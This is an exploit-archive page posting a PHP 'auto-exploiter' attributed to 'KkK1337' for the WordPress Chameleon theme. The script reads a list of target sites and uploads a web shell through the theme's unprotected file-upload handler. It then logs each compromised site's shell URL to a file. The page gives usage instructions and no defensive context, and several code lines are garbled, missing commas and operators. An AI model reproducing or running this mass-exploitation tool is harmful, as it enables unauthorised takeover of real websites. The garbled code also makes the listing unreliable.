facebook facebook twitter rss

WordPress chameleon auto-exploiter

Author: KkK1337 , Published: 12-10-2014

Name your shell as shell.phtml or credits.phtml


Usage: php file.php lista.txt

All sites with shell uploaded will be saved in new.txt

Source code:

<?php 

// Coded by KkK1337
// Greetz to: Condor8
// fb: https://www.facebook.com/Cracker1337
// pastebin: http://pastebin.com/u/KkK1337
// don't change rights

echo "chameleon auto-exploiter by KkK1337";

$x=file($argv[1]);
foreach (
$x as $sites){
$sites=trim($sites);
$uploadfile="credits.phtml"
$ch curl_init("$sites/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php"); 
curl_setopt($chCURLOPT_POSTtrue); 
curl_setopt($chCURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1); 
$waw curl_exec($ch); 
curl_close($ch); 
if(
preg_match("/success/i",$waw)){
print 
"shell uploaded : $sites \n"
$u="$sites/wp-content/uploads/2014/10/credits.phtml"// Change year and month. Year: 2014 , Month: 10
$ux "".$u."\r\n"$save=fopen('new.txt','ab'); fwrite($save,"$ux");
}
else{
echo 
"Not vuln : $sites\n";
}
}

?>

Like us on Facebook :